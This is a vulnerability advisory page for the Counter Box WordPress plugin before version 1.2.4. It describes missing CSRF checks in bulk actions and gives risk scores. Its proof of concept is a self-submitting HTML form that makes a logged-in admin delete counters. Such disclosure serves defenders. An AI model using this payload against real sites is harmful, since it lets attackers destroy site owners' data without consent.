Lucene search

K
wpexploitBob MatyasWPEX-ID:0C441293-E7F9-4634-8F3A-09925CD2B696
HistoryApr 11, 2024 - 12:00 a.m.

Counter Box < 1.2.4 - Counter Deletion via CSRF

2024-04-1100:00:00
Bob Matyas
19
counter box
csrf
vulnerability
poc
april 25 2024

6.8 Medium

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

9.0%

Description The plugin does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such deleting counters via CSRF attacks

Make a logged in admin open an HTML file where ID is a valid ID:


```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=counter-box" method="POST">
        <input type="text" name="ID" value="1" />
        <input type="text" name="action" value="delete-items" />
        <input type="text" name="action2" value="delete-items" />
        action
        <input type="submit" value="submit">
    </form>
</body>
```

6.8 Medium

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

9.0%

Related for WPEX-ID:0C441293-E7F9-4634-8F3A-09925CD2B696